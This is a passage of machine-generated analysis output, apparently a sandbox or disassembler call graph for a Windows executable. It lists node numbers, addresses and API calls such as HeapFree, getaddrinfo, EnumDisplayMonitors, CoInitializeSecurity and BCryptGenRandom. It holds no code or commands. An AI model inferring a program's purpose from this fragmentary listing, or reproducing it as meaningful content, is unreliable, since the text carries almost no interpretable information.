42 API calls 89753->89754 89755 7ff6d35060b5 89754->89755 89756 7ff6d3734b10 42 API calls 89755->89756 89757 7ff6d35060c1 89756->89757 89758 7ff6d3734950 42 API calls 89757->89758 89759 7ff6d35060cd 89758->89759 89760 7ff6d37341f0 42 API calls 89759->89760 89761 7ff6d35060dc 89760->89761 89763 7ff6d34fb2b5 89762->89763 89765 7ff6d34fb2a0 89762->89765 89763->89155 89764 7ff6d34f9418 2 API calls 89764->89765 89765->89763 89765->89764 89767 7ff6d34f7626 89766->89767 89768 7ff6d34f7611 89766->89768 89769 7ff6d34f762d HeapFree 89767->89769 89770 7ff6d34f7647 89767->89770 89768->89767 89771 7ff6d34f9418 2 API calls 89768->89771 89769->89770 89770->89155 89771->89768 89773 7ff6d34f9bca 89772->89773 89777 7ff6d34f9bb6 89772->89777 89774 7ff6d34f9bd0 HeapFree 89773->89774 89775 7ff6d34f9bec 89773->89775 89774->89775 89775->89155 89776 7ff6d34f9418 2 API calls 89776->89777 89777->89773 89777->89776 89778->89122 89779->89122 89780->89122 89781->89093 89783->89076 89784->89068 89785->89155 89786->89155 89787->89155 89788->89155 89789->89155 89790->89155 89791->89155 89792->89093 89793->89093 89794->89118 89795->89706 89796->89710 89797->89735 89798->89739 89799 7ff6d35cd99e 89800 7ff6d35efed0 3 API calls 89799->89800 89801 7ff6d35cd9d4 89800->89801 89802 7ff6d35cd9dd EnumDisplayMonitors 89801->89802 89807 7ff6d35d00c3 89801->89807 89803 7ff6d35cdd15 89802->89803 89812 7ff6d35cda0d 89802->89812 89804 7ff6d35cdd0d 89806 7ff6d34f8dc1 2 API calls 89804->89806 89806->89803 89809 7ff6d37341f0 42 API calls 89807->89809 90057 7ff6d3734d00 42 API calls 89807->90057 90058 7ff6d373463f 42 API calls 89807->90058 89809->89807 89811 7ff6d35d00b2 90056 7ff6d37346e0 42 API calls 89811->90056 89812->89804 89812->89811 89818 7ff6d35cdaec HeapFree 89812->89818 89819 7ff6d35cdb07 89812->89819 90021 7ff6d3547c40 89812->90021 90028 7ff6d3547ccd 89812->90028 90039 7ff6d360b1d8 89812->90039 89818->89812 90053 7ff6d34f8dc1 89819->90053 90022 7ff6d3547c85 90021->90022 90023 7ff6d3547c5b 90021->90023 90024 7ff6d37341f0 42 API calls 90022->90024 90027 7ff6d3547ca6 memmove 90022->90027 90023->90022 90025 7ff6d3547c9d 90023->90025 90026 7ff6d35efed0 3 API calls 90023->90026 90024->90025 90025->90027 90026->90022 90027->89812 90029 7ff6d3547ce9 90028->90029 90030 7ff6d3547d1c 90028->90030 90032 7ff6d3547d0d 90029->90032 90059 7ff6d3547d9d 43 API calls 90029->90059 90030->90032 90060 7ff6d3547d9d 43 API calls 90030->90060 90033 7ff6d3547d93 90032->90033 90034 7ff6d3547d7c HeapFree 90032->90034 90035 7ff6d3547d51 HeapReAlloc 90032->90035 90033->89812 90034->90033 90035->90033 90037 7ff6d3547d6f 90035->90037 90038 7ff6d37341f0 42 API calls 90037->90038 90038->90034 90040 7ff6d360b214 90039->90040 90041 7ff6d360b43a 90040->90041 90046 7ff6d360b24b 90040->90046 90042 7ff6d3739c8a 43 API calls 90041->90042 90043 7ff6d360b446 90042->90043 90043->90043 90044 7ff6d35cdab2 HeapFree 90049 7ff6d35d342e 90044->90049 90046->90044 90047 7ff6d360b3a0 memmove 90046->90047 90061 7ff6d354e1e6 43 API calls 90046->90061 90062 7ff6d3739c8a 90046->90062 90047->90046 90050 7ff6d35d343b 90049->90050 90052 7ff6d35d3436 90049->90052 90050->89812 90051 7ff6d373463f 42 API calls 90051->90052 90052->90050 90052->90051 90054 7ff6d34f8de2 HeapFree 90053->90054 90055 7ff6d34f8dcf HeapFree 90053->90055 90055->90054 90059->90032 90060->90032 90061->90046 90068 7ff6d3578a53 90062->90068 90065 7ff6d3739ca2 90065->90046 90066 7ff6d37341f0 42 API calls 90067 7ff6d3739caf 90066->90067 90069 7ff6d3578a9c 90068->90069 90070 7ff6d3578a5f 90068->90070 90069->90065 90069->90066 90070->90069 90072 7ff6d360b44b 90070->90072 90073 7ff6d360b47c 90072->90073 90074 7ff6d360b45e 90072->90074 90076 7ff6d35efed0 3 API calls 90073->90076 90074->90073 90075 7ff6d360b465 RtlReAllocateHeap 90074->90075 90077 7ff6d360b48c 90075->90077 90076->90077 90077->90069 90078 7ff6d3527fba HeapFree 90079 7ff6d35df580 72 API calls 90078->90079 90080 7ff6d3527fe8 90079->90080 90081 7ff6d34f8868 2 API calls 90080->90081 90082 7ff6d3528038 90081->90082 90083 7ff6d3527d4a 90082->90083 90084 7ff6d3528353 90082->90084 90087 7ff6d35db150 42 API calls 90083->90087 90085 7ff6d34f7789 3 API calls 90084->90085 90086 7ff6d3528395 90085->90086 90090 7ff6d3532a40 43 API calls 90086->90090 90088 7ff6d3527de2 90087->90088 90089 7ff6d35401d0 43 API calls 90088->90089 90100 7ff6d3527e66 90089->90100 90091 7ff6d35283f3 90090->90091 90092 7ff6d351bbee 186 API calls 90091->90092 90094 7ff6d35283fb 90092->90094 90093 7ff6d35004cb 42 API calls 90093->90100 90095 7ff6d3532a40 43 API calls 90094->90095 90096 7ff6d352840b 90095->90096 90098 7ff6d35189dc 183 API calls 90096->90098 90097 7ff6d3527eb1 memmove 90099 7ff6d3527ede memmove 90097->90099 90097->90100 90103 7ff6d3528413 90098->90103 90099->90100 90100->90093 90100->90097 90100->90099 90101 7ff6d37392c1 43 API calls 90100->90101 90102 7ff6d352d2e4 90100->90102 90101->90100 90230 7ff6d3545430 HeapFree 90102->90230 90105 7ff6d3531a60 43 API calls 90103->90105 90110 7ff6d35285a9 90105->90110 90112 7ff6d3531a60 43 API calls 90110->90112 90117 7ff6d35287cb 90112->90117 90119 7ff6d3531a60 43 API calls 90117->90119 90123 7ff6d35289ef 90119->90123 90127 7ff6d3531a60 43 API calls 90123->90127 90132 7ff6d3528bcb 90127->90132 90136 7ff6d3531a60 43 API calls 90132->90136 90138 7ff6d3528dbb 90136->90138 90140 7ff6d35cc354 48 API calls 90138->90140 90142 7ff6d3528e2b 90140->90142 90144 7ff6d360ec67 50 API calls 90142->90144 90146 7ff6d3528e3e 90144->90146 90149 7ff6d352d5a0 90146->90149 90152 7ff6d35efed0 3 API calls 90146->90152 90154 7ff6d3528e86 90152->90154 90156 7ff6d3528e8f EnumDisplayMonitors 90154->90156 90162 7ff6d352d5b6 90154->90162 90158 7ff6d3528f19 90156->90158 90161 7ff6d352d7b8 90158->90161 90181 7ff6d35291e8 90158->90181 90164 7ff6d37341f0 42 API calls 90161->90164 90232 7ff6d3734750 42 API calls 90162->90232 90167 7ff6d352d7c0 90164->90167 90237 7ff6d373463f 42 API calls 90167->90237 90168 7ff6d352d5f3 90233 7ff6d35f3b87 GetLastError 90168->90233 90175 7ff6d352d5f8 90234 7ff6d37346b0 42 API calls 90175->90234 90187 7ff6d35db520 50 API calls 90181->90187 90182 7ff6d352d651 90235 7ff6d35f3b87 GetLastError 90182->90235 90190 7ff6d35294df 90187->90190 90188 7ff6d352d656 90236 7ff6d37346b0 42 API calls 90188->90236 90194 7ff6d35ef8a0 46 API calls 90190->90194 90192 7ff6d352d6af 90196 7ff6d35294f6 90194->90196 90198 7ff6d3531a60 43 API calls 90196->90198 90200 7ff6d352954b 90198->90200 90203 7ff6d34f5593 64 API calls 90200->90203 90204 7ff6d352959e 90203->90204 90204->90162 90205 7ff6d35295a6 CloseHandle 90204->90205 90206 7ff6d35db520 50 API calls 90205->90206 90207 7ff6d35295b7 90206->90207 90208 7ff6d35ef8a0 46 API calls 90207->90208 90209 7ff6d35295c7 90208->90209 90210 7ff6d3531a60 43 API calls 90209->90210 90211 7ff6d3529607 90210->90211 90212 7ff6d35e20e0 43 API calls 90211->90212 90213 7ff6d3529673 90212->90213 90214 7ff6d35e20e0 43 API calls 90213->90214 90215 7ff6d352968e GetSystemTimeAsFileTime 90214->90215 90215->90162 90216 7ff6d35296df FileTimeToSystemTime 90215->90216 90216->90168 90217 7ff6d3529742 SystemTimeToTzSpecificLocalTime 90216->90217 90217->90182 90218 7ff6d3529766 SystemTimeToFileTime memset GetTimeZoneInformation 90217->90218 90219 7ff6d3529858 90218->90219 90220 7ff6d35dbdc0 63 API calls 90219->90220 90221 7ff6d35298a6 90220->90221 90221->90192 90222 7ff6d360fc8b 51 API calls 90221->90222 90223 7ff6d352996e 90222->90223 90233->90175 90235->90188 90238 7ff6d352257a 90239 7ff6d352264b 90238->90239 90240 7ff6d35c268b 105 API calls 90239->90240 90241 7ff6d352266b 90240->90241 90242 7ff6d35b50f7 358 API calls 90241->90242 90243 7ff6d3522673 90242->90243 90244 7ff6d35c1c41 135 API calls 90243->90244 90245 7ff6d35226d2 90244->90245 90246 7ff6d352dcd4 90245->90246 90247 7ff6d35c292b 135 API calls 90245->90247 90248 7ff6d352277f 90247->90248 90249 7ff6d35c2fc9 198 API calls 90248->90249 90250 7ff6d3522791 memmove 90249->90250 90251 7ff6d35227b0 90250->90251 90252 7ff6d35b6cd6 366 API calls 90251->90252 90253 7ff6d35227d3 90252->90253 90254 7ff6d35227eb memmove 90253->90254 90266 7ff6d35227dc 90253->90266 90255 7ff6d34f8e23 19 API calls 90254->90255 90256 7ff6d3522810 memmove memmove 90255->90256 90258 7ff6d34f9895 19 API calls 90256->90258 90259 7ff6d3522867 90258->90259 90260 7ff6d352d791 90259->90260 90261 7ff6d3522871 memmove memmove memmove memmove 90259->90261 90262 7ff6d3522930 memmove memmove 90261->90262 90263 7ff6d352296e 90262->90263 90264 7ff6d34fff3d 112 API calls 90263->90264 90265 7ff6d352298e 90264->90265 90265->90266 90267 7ff6d34f9b47 7 API calls 90265->90267 90268 7ff6d35229c0 90267->90268 90269 7ff6d34f7b99 9 API calls 90268->90269 90270 7ff6d3522c6d 90269->90270 90270->90260 90271 7ff6d35db150 42 API calls 90270->90271 90273 7ff6d3522cd4 90271->90273 90272 7ff6d352d862 90274 7ff6d3734b10 42 API calls 90272->90274 90273->90272 90275 7ff6d35efed0 3 API calls 90273->90275 90276 7ff6d352d89c 90274->90276 90281 7ff6d3522d53 90275->90281 90278 7ff6d3734b10 42 API calls 90276->90278 90277 7ff6d352d776 90279 7ff6d37341f0 42 API calls 90277->90279 90280 7ff6d352d8a8 90278->90280 90282 7ff6d352d785 90279->90282 90283 7ff6d3734b10 42 API calls 90280->90283 90281->90277 90286 7ff6d35d2f94 memcmp 90281->90286 90282->90260 90284 7ff6d3734b10 42 API calls 90282->90284 90285 7ff6d352d8b4 90283->90285 90284->90260 90287 7ff6d3734b10 42 API calls 90285->90287 90288 7ff6d3522e50 90286->90288 90289 7ff6d352d8c0 90287->90289 90288->90272 90290 7ff6d3522e67 90288->90290 90291 7ff6d3734b10 42 API calls 90289->90291 90292 7ff6d3531a60 43 API calls 90290->90292 90293 7ff6d352d8cc 90291->90293 90295 7ff6d3522ed0 90292->90295 90294 7ff6d3734b10 42 API calls 90293->90294 90294->90260 90296 7ff6d35d2f94 memcmp 90295->90296 90297 7ff6d3522fac 90296->90297 90297->90276 90298 7ff6d3522fbc 90297->90298 90299 7ff6d3531a60 43 API calls 90298->90299 90300 7ff6d3523020 90299->90300 90301 7ff6d35d2f94 memcmp 90300->90301 90302 7ff6d35230cd 90301->90302 90302->90280 90303 7ff6d35230dd 90302->90303 90304 7ff6d3531a60 43 API calls 90303->90304 90305 7ff6d3523141 90304->90305 90306 7ff6d35d2f94 memcmp 90305->90306 90307 7ff6d35231fe 90306->90307 90307->90285 90308 7ff6d352320e 90307->90308 90309 7ff6d3531a60 43 API calls 90308->90309 90310 7ff6d3523272 90309->90310 90311 7ff6d35d2f94 memcmp 90310->90311 90312 7ff6d3523327 90311->90312 90313 7ff6d35d2f94 memcmp 90312->90313 90314 7ff6d3523342 90313->90314 90314->90289 90315 7ff6d3523352 90314->90315 90316 7ff6d35d2f94 memcmp 90315->90316 90317 7ff6d3523371 90316->90317 90318 7ff6d35d2f94 memcmp 90317->90318 90319 7ff6d352338c 90318->90319 90319->90282 90320 7ff6d3531a60 43 API calls 90319->90320 90747 7ff6d35d0760 90748 7ff6d35d0784 memmove 90747->90748 90749 7ff6d35d07a7 90747->90749 90752 7ff6d3734596 90749->90752 90753 7ff6d35d0681 4 API calls 90752->90753 90754 7ff6d37345ae 90753->90754 90755 7ff6d35d07b5 90754->90755 90756 7ff6d37341f0 42 API calls 90754->90756 90755->90748 90757 7ff6d37345ca 90756->90757 90758 7ff6d35e1700 90759 7ff6d35e18ee 90758->90759 90760 7ff6d35e173a 90758->90760 90769 7ff6d37386be 90759->90769 90762 7ff6d35e1755 memmove 90760->90762 90763 7ff6d35e18f6 90760->90763 90765 7ff6d35e1773 90762->90765 90773 7ff6d3738720 51 API calls 90763->90773 90766 7ff6d35e1859 getaddrinfo 90765->90766 90768 7ff6d35e1793 90765->90768 90767 7ff6d35e18a4 WSAGetLastError 90766->90767 90766->90768 90767->90768 90770 7ff6d37386d9 90769->90770 90772 7ff6d37386d3 90769->90772 90771 7ff6d3737ec0 4 API calls 90770->90771 90771->90772 90772->90763 90773->90768 90774 7ff6d34f406d 90777 7ff6d34f408b 90774->90777 90775 7ff6d350249c 363 API calls 90775->90777 90776 7ff6d34f42dc 90777->90775 90777->90776 90779 7ff6d350218b 77 API calls 90777->90779 90781 7ff6d34f426f HeapFree 90777->90781 90782 7ff6d34f422e HeapFree 90777->90782 90783 7ff6d3502020 77 API calls 90777->90783 90784 7ff6d34f89bf HeapFree HeapFree 90777->90784 90779->90777 90781->90777 90782->90777 90783->90777 90784->90777 90785 7ff6d3524a81 90786 7ff6d35db520 50 API calls 90785->90786 90787 7ff6d3524a90 90786->90787 90788 7ff6d3524aea 90787->90788 90789 7ff6d3524af1 90787->90789 90791 7ff6d3734a10 42 API calls 90787->90791 90823 7ff6d3736286 90788->90823 90792 7ff6d37392c1 43 API calls 90789->90792 90822 7ff6d3524fe8 90789->90822 90791->90788 90793 7ff6d3524b4b 90792->90793 90795 7ff6d37392c1 43 API calls 90793->90795 90796 7ff6d3524c3a 90793->90796 90841 7ff6d35fefc3 43 API calls 90793->90841 90795->90793 90837 7ff6d357a352 90796->90837 90799 7ff6d3531a60 43 API calls 90800 7ff6d3524ceb 90799->90800 90801 7ff6d3524d07 90800->90801 90802 7ff6d3524cf1 HeapFree 90800->90802 90803 7ff6d3524d27 90801->90803 90804 7ff6d3524d11 HeapFree 90801->90804 90802->90801 90805 7ff6d35e1360 56 API calls 90803->90805 90804->90803 90806 7ff6d3524d91 90805->90806 90807 7ff6d35de9a0 42 API calls 90806->90807 90808 7ff6d3524d9e 90807->90808 90809 7ff6d3524da7 CoInitializeEx 90808->90809 90810 7ff6d352dd0f 90808->90810 90811 7ff6d3524dbb CoInitializeSecurity 90809->90811 90809->90822 90812 7ff6d3524df6 90811->90812 90811->90822 90813 7ff6d35db520 50 API calls 90812->90813 90814 7ff6d3524e05 90813->90814 90815 7ff6d3531a60 43 API calls 90814->90815 90816 7ff6d3524ed6 90815->90816 90817 7ff6d3524edc HeapFree 90816->90817 90818 7ff6d3524eee 90816->90818 90817->90818 90819 7ff6d3531a60 43 API calls 90818->90819 90820 7ff6d3524fe0 90819->90820 90821 7ff6d34f5593 64 API calls 90820->90821 90821->90822 90824 7ff6d3736294 90823->90824 90825 7ff6d37363a9 90824->90825 90842 7ff6d357c7e4 90824->90842 90830 7ff6d373641b 90825->90830 90831 7ff6d357a352 HeapFree 90825->90831 90827 7ff6d37362be 90828 7ff6d3736426 90827->90828 90829 7ff6d37362c7 90827->90829 90848 7ff6d37346b0 42 API calls 90828->90848 90834 7ff6d35efed0 3 API calls 90829->90834 90830->90789 90831->90830 90833 7ff6d3736481 90835 7ff6d3736324 90834->90835 90835->90833 90836 7ff6d373632d memset 90835->90836 90836->90825 90838 7ff6d357a357 90837->90838 90839 7ff6d3524c71 90837->90839 90838->90839 90840 7ff6d357a361 HeapFree 90838->90840 90839->90799 90841->90793 90843 7ff6d357c808 90842->90843 90844 7ff6d357c80d BCryptGenRandom 90843->90844 90847 7ff6d357c84a 90843->90847 90844->90843 90845 7ff6d357c836 90844->90845 90846 7ff6d35efed0 3 API calls 90845->90846 90846->90847 90847->90827 90849 7ff6d34f6a6b 90857 7ff6d34f6872 90849->90857 90850 7ff6d360ec67 50 API calls 90850->90857 90851 7ff6d34f70e1 90858 7ff6d37346e0 42 API calls 90851->90858 90854 7ff6d34f6ce7 90855 7ff6d35dd5f0 2 API calls 90854->90855 90856 7ff6d34f6cfa 90855->90856 90857->90850 90857->90851 90857->90854 90857->90856 90859 7ff6d34f3568 90867 7ff6d34f359a 90859->90867 90860 7ff6d350249c 363 API calls 90860->90867 90861 7ff6d34f3c6e 90863 7ff6d350218b 77 API calls 90863->90867 90864 7ff6d34f3889 HeapFree 90864->90867 90866 7ff6d34f38fd HeapFree 90866->90867 90867->90860 90867->90861 90867->90863 90867->90864 90867->90866 90868 7ff6d34f3937 HeapFree 90867->90868 90869 7ff6d34f39ae HeapFree 90867->90869 90870 7ff6d34f39e3 HeapFree 90867->90870 90871 7ff6d34f3c05 HeapFree 90867->90871 90872 7ff6d34f3a80 HeapFree 90867->90872 90873 7ff6d3502384 76 API calls 90867->90873 90874 7ff6d34f3ab3 HeapFree 90867->90874 90875 7ff6d34f3ae3 HeapFree 90867->90875 90876 7ff6d34f3b7b HeapFree 90867->90876 90877 7ff6d34f3ba2 HeapFree 90867->90877 90878 7ff6d34f3bce HeapFree 90867->90878 90879 7ff6d3502020 77 API calls 90867->90879 90880 7ff6d34f89bf HeapFree HeapFree 90867->90880 90868->90867 90869->90867 90870->90867 90871->90867 90872->90867 90873->90867 90874->90867 90875->90867 90876->90867 90877->90867 90878->90867 90879->90867 90880->90867 90881 7ff6d36c60ec 90882 7ff6d36c6117 90881->90882 90884 7ff6d36c6125 90881->90884 90883 7ff6d36f984c memset 90882->90883 90883->90884 90885 7ff6d36c6159 90884->90885 90887 7ff6d36c6166 90884->90887 90892 7ff6d36c6135 90884->90892 90899 7ff6d36c63b4 90885->90899 90890 7ff6d36c61b7 90887->90890 90910 7ff6d36c7208 59 API calls 90887->90910 90894 7ff6d36c6270 90890->90894 90911 7ff6d36cad18 12 API calls _cwprintf_s_l 90890->90911 90912 7ff6d36c7208 59 API calls 90890->90912 90891 7ff6d36c634f 90891->90892 90914 7ff6d36c7208 59 API calls 90891->90914 90894->90891 90894->90892 90913 7ff6d3724f24 memset memset 90894->90913 90897 7ff6d36c62f8 90897->90891 90898 7ff6d36c632b memset 90897->90898 90898->90891 90900 7ff6d36c6469 90899->90900 90901 7ff6d36c63e8 memmove 90899->90901 90921 7ff6d36fc6ac 9 API calls _cwprintf_s_l 90900->90921 90906 7ff6d36c640c 90901->90906 90903 7ff6d36c6475 90905 7ff6d36c6497 90903->90905 90909 7ff6d36c658c 36 API calls 90903->90909 90904 7ff6d36c645b 90904->90900 90920 7ff6d3724ca4 memset memset memset 90904->90920 90905->90892 90906->90904 90915 7ff6d36c658c 90906->90915 90909->90903 90910->90887 90911->90890 90912->90890 90913->90897 90914->90891 90922 7ff6d36fabac memset memset 90915->90922 90917 7ff6d36c65aa 90919 7ff6d36c65be 90917->90919 90923 7ff6d36cac14 90917->90923 90919->90906 90920->90900 90921->90903 90922->90917 90924 7ff6d36cac52 90923->90924 90925 7ff6d36cac47 90923->90925 90927 7ff6d36cad03 90924->90927 90928 7ff6d36cacea memset 90924->90928 90929 7ff6d36cacf6 memmove 90924->90929 90930 7ff6d3716300 32 API calls 90925->90930 90927->90919 90928->90927 90929->90927 90930->90924 90931 7ff6d35268e7 90931->90931 90932 7ff6d35268f3 90931->90932 90933 7ff6d3526910 HeapFree 90932->90933 90933->90933 90934 7ff6d352692c HeapFree 90933->90934 90936 7ff6d3526951 90934->90936 90937 7ff6d352695b HeapFree 90936->90937 90938 7ff6d3526971 90936->90938 90937->90938 90939 7ff6d34f7d06 4 API calls 90938->90939 90940 7ff6d352697d 90939->90940 90941 7ff6d3526987 HeapFree 90940->90941 90942 7ff6d352699d 90940->90942 90941->90942 90943 7ff6d35269a7 HeapFree 90942->90943 90944 7ff6d35269bd 90942->90944 90943->90944 90945 7ff6d34f7d06 4 API calls 90944->90945 90946 7ff6d35269c9 90945->90946 90947 7ff6d35269e9 90946->90947 90948 7ff6d35269d3 HeapFree 90946->90948 90949 7ff6d3526a09 90947->90949 90950 7ff6d35269f3 HeapFree 90947->90950 90948->90947 90951 7ff6d34f7d06 4 API calls 90949->90951 90950->90949 90952 7ff6d3526a15 90951->90952 90953 7ff6d3526a3d memmove 90952->90953 91206 7ff6d352c828 90952->91206 90954 7ff6d3577892 HeapFree 90953->90954 90956 7ff6d3526a6e 90954->90956 90955 7ff6d37392c1 43 API calls 90957 7ff6d352c853 90955->90957 90958 7ff6d3526a78 HeapFree 90956->90958 90960 7ff6d3526a8a 90956->90960 90959 7ff6d37341f0 42 API calls 90957->90959 90958->90960 90961 7ff6d352d44a 90959->90961 90960->90960 90963 7ff6d35efed0 3 API calls 90960->90963 90962 7ff6d37341f0 42 API calls 90961->90962 91171 7ff6d352d459 90962->91171 90964 7ff6d3526b16 90963->90964 90966 7ff6d352d4dd 90964->90966 90968 7ff6d3526b46 90964->90968 90973 7ff6d357c9e5 43 API calls 90964->90973 90969 7ff6d37341f0 42 API calls 90966->90969 90970 7ff6d3532a40 43 API calls 90968->90970 90971 7ff6d352d4ec 90969->90971 90974 7ff6d3526b8d 90970->90974 90975 7ff6d37341f0 42 API calls 90971->90975 90973->90968 90977 7ff6d3502b57 243 API calls 90974->90977 90978 7ff6d352d4fb 90975->90978 90980 7ff6d3526b95 90977->90980 90981 7ff6d37341f0 42 API calls 90978->90981 90983 7ff6d3532a40 43 API calls 90980->90983 90984 7ff6d352d50a 90981->90984 90986 7ff6d3526bb3 memmove 90983->90986 90987 7ff6d37341f0 42 API calls 90984->90987 90989 7ff6d35142d8 683 API calls 90986->90989 90990 7ff6d352d519 90987->90990 90992 7ff6d3526be9 90989->90992 90993 7ff6d37341f0 42 API calls 90990->90993 90995 7ff6d34f995c 18 API calls 90992->90995 90996 7ff6d352d528 90993->90996 90998 7ff6d3526bf8 90995->90998 90999 7ff6d37341f0 42 API calls 90996->90999 91001 7ff6d3532a40 43 API calls 90998->91001 91002 7ff6d352d537 90999->91002 91004 7ff6d3526c0f 91001->91004 91005 7ff6d37341f0 42 API calls 91002->91005 91006 7ff6d3532a40 43 API calls 91004->91006 91007 7ff6d352d546 91005->91007 91008 7ff6d3526c23 91006->91008 91009 7ff6d37341f0 42 API calls 91007->91009 91010 7ff6d355daf7 42 API calls 91008->91010 91011 7ff6d352d555 91009->91011 91012 7ff6d3526c2f 91010->91012 91013 7ff6d37341f0 42 API calls 91011->91013 91016 7ff6d35efed0 3 API calls 91012->91016 91014 7ff6d352d564 91013->91014 91015 7ff6d37341f0 42 API calls 91014->91015 91017 7ff6d352d573 91015->91017 91021 7ff6d3526ca8 91016->91021 91018 7ff6d37341f0 42 API calls 91017->91018 91019 7ff6d352d582 91018->91019 91020 7ff6d37341f0 42 API calls 91019->91020 91022 7ff6d352d591 91020->91022 91021->90971 91025 7ff6d35efed0 3 API calls 91021->91025 91023 7ff6d37341f0 42 API calls 91022->91023 91024 7ff6d352d5a0 91023->91024 91026 7ff6d3526db2 91025->91026 91026->90978 91027 7ff6d34f529f 48 API calls 91026->91027 91028 7ff6d3526e0c 91027->91028 91029 7ff6d3526e2c 91028->91029 91030 7ff6d3526e16 HeapFree 91028->91030 91031 7ff6d35efed0 3 API calls 91029->91031 91030->91029 91032 7ff6d3526e79 91031->91032 91032->90961 91033 7ff6d35efed0 3 API calls 91032->91033 91034 7ff6d3526fa3 91033->91034 91034->90984 91035 7ff6d34f529f 48 API calls 91034->91035 91036 7ff6d3526ff2 91035->91036 91037 7ff6d3527012 91036->91037 91038 7ff6d3526ffc HeapFree 91036->91038 91039 7ff6d35efed0 3 API calls 91037->91039 91038->91037 91040 7ff6d3527060 91039->91040 91040->90990 91041 7ff6d3527111 memmove 91040->91041 91042 7ff6d35efed0 3 API calls 91041->91042 91043 7ff6d352714c 91042->91043 91043->90996 91044 7ff6d3527155 memmove 91043->91044 91045 7ff6d34f529f 48 API calls 91044->91045 91046 7ff6d352719c 91045->91046 91047 7ff6d35271bc 91046->91047 91048 7ff6d35271a6 HeapFree 91046->91048 91048->91047 91208 7ff6d37345d0 42 API calls 91171->91208 91206->90955 91216 7ff6d35ef470 91217 7ff6d35ef495 CancelIo 91216->91217 91222 7ff6d35ef4cb 91216->91222 91219 7ff6d35ef4e5 GetLastError 91217->91219 91220 7ff6d35ef4a2 GetOverlappedResult 91217->91220 91218 7ff6d35ef535 CloseHandle CloseHandle HeapFree 91221 7ff6d35ef566 GetLastError 91218->91221 91219->91222 91220->91221 91220->91222 91221->91222 91222->91218 91223 7ff6d35efed0 3 API calls 91222->91223 91224 7ff6d35ef584 91222->91224 91223->91222 91225 7ff6d35ef5cc HeapFree 91224->91225 91226 7ff6d35ef5eb CloseHandle CloseHandle HeapFree 91224->91226 91225->91226 91227 7ff6d351de6b 91228 7ff6d351de72 91227->91228 91229 7ff6d351dee1 91228->91229 91230 7ff6d351de84 91228->91230 91369 7ff6d35d5c30 50 API calls 91229->91369 91231 7ff6d351ed7c 91230->91231 91232 7ff6d351dec1 memmove 91230->91232 91233 7ff6d351e074 91230->91233 91235 7ff6d3734b10 42 API calls 91231->91235 91366 7ff6d351d2ba 91232->91366 91237 7ff6d37392c1 43 API calls 91233->91237 91234 7ff6d351deea 91236 7ff6d351ed88 91234->91236 91374 7ff6d3545048 91234->91374 91235->91236 91383 7ff6d37346e0 42 API calls 91236->91383 91247 7ff6d351df8e 91237->91247 91239 7ff6d351eda6 91384 7ff6d37345d0 42 API calls 91239->91384 91241 7ff6d351ed9a 91244 7ff6d3734b10 42 API calls 91241->91244 91243 7ff6d351df4e 91243->91241 91243->91247 91248 7ff6d351dfab 91243->91248 91244->91239 91249 7ff6d34f8868 2 API calls 91247->91249 91247->91366 91378 7ff6d35d110b 44 API calls 91248->91378 91249->91366 91250 7ff6d351d882 HeapFree 91250->91366 91252 7ff6d34f99da HeapFree HeapFree CloseHandle 91252->91366 91253 7ff6d351d704 HeapFree 91253->91366 91254 7ff6d351d46e memmove 91254->91366 91255 7ff6d34f7fc7 58 API calls 91255->91366 91257 7ff6d35dbdc0 63 API calls 91257->91366 91258 7ff6d351e11a HeapFree 91258->91366 91259 7ff6d35dc040 2 API calls 91259->91366 91260 7ff6d351e13a 91261 7ff6d34f98d1 2 API calls 91260->91261 91263 7ff6d351e14a 91261->91263 91262 7ff6d35df580 72 API calls 91262->91366 91264 7ff6d351e35d 91263->91264 91265 7ff6d351e16f 91263->91265 91269 7ff6d351e38f 91264->91269 91273 7ff6d34f8868 2 API calls 91264->91273 91267 7ff6d351e19d CloseHandle 91265->91267 91276 7ff6d351d5bc 91265->91276 91266 7ff6d37341f0 42 API calls 91266->91276 91267->91269 91271 7ff6d351e1b1 91267->91271 91268 7ff6d35efed0 HeapAlloc GetProcessHeap HeapAlloc 91268->91366 91274 7ff6d3577892 HeapFree 91269->91274 91270 7ff6d35e20e0 43 API calls 91270->91366 91283 7ff6d3531a60 43 API calls 91271->91283 91272 7ff6d3734b10 42 API calls 91272->91276 91273->91269 91277 7ff6d351e3a1 91274->91277 91275 7ff6d37372c2 42 API calls 91275->91276 91276->91266 91276->91272 91276->91275 91382 7ff6d3734b30 42 API calls 91276->91382 91281 7ff6d351e3a9 HeapFree 91277->91281 91282 7ff6d351e3bb 91277->91282 91278 7ff6d351d67f RtlFreeHeap 91278->91366 91280 7ff6d35e1dd0 42 API calls 91280->91366 91281->91282 91380 7ff6d34f976b 55 API calls 91282->91380 91285 7ff6d351e29c 91283->91285 91289 7ff6d35f3510 60 API calls 91285->91289 91286 7ff6d351e3c8 91287 7ff6d351e358 91286->91287 91288 7ff6d351e3d3 HeapFree 91286->91288 91290 7ff6d351e40c 91287->91290 91291 7ff6d351e3f5 HeapFree 91287->91291 91288->91287 91292 7ff6d351e2bc 91289->91292 91295 7ff6d3532a40 43 API calls 91290->91295 91291->91290 91296 7ff6d351e2c8 HeapFree 91292->91296 91297 7ff6d351e2da 91292->91297 91293 7ff6d351eb09 91298 7ff6d3734b10 42 API calls 91293->91298 91294 7ff6d351d64b memcmp 91294->91366 91299 7ff6d351e420 91295->91299 91296->91297 91300 7ff6d351e2fc 91297->91300 91301 7ff6d351e2e5 HeapFree 91297->91301 91302 7ff6d351eb15 91298->91302 91303 7ff6d35db150 42 API calls 91299->91303 91304 7ff6d351e31f 91300->91304 91308 7ff6d34f8868 2 API calls 91300->91308 91301->91300 91305 7ff6d37341f0 42 API calls 91302->91305 91317 7ff6d351e43d 91303->91317 91307 7ff6d3577892 HeapFree 91304->91307 91309 7ff6d351eb24 91305->91309 91306 7ff6d35dd4b0 57 API calls 91306->91366 91310 7ff6d351e331 91307->91310 91308->91304 91311 7ff6d37341f0 42 API calls 91309->91311 91313 7ff6d351e339 HeapFree 91310->91313 91314 7ff6d351e34b 91310->91314 91312 7ff6d351eb33 91311->91312 91315 7ff6d3734b10 42 API calls 91312->91315 91313->91314 91379 7ff6d34f976b 55 API calls 91314->91379 91320 7ff6d351eb3f 91315->91320 91317->91320 91321 7ff6d3531a60 43 API calls 91317->91321 91318 7ff6d34f8868 HeapFree HeapFree 91318->91366 91319 7ff6d3734a10 42 API calls 91319->91320 91320->91319 91322 7ff6d351e58a 91321->91322 91323 7ff6d351e5ac 91322->91323 91324 7ff6d351e595 HeapFree 91322->91324 91325 7ff6d35df580 72 API calls 91323->91325 91324->91323 91327 7ff6d351e5d1 91325->91327 91326 7ff6d34f62c1 42 API calls 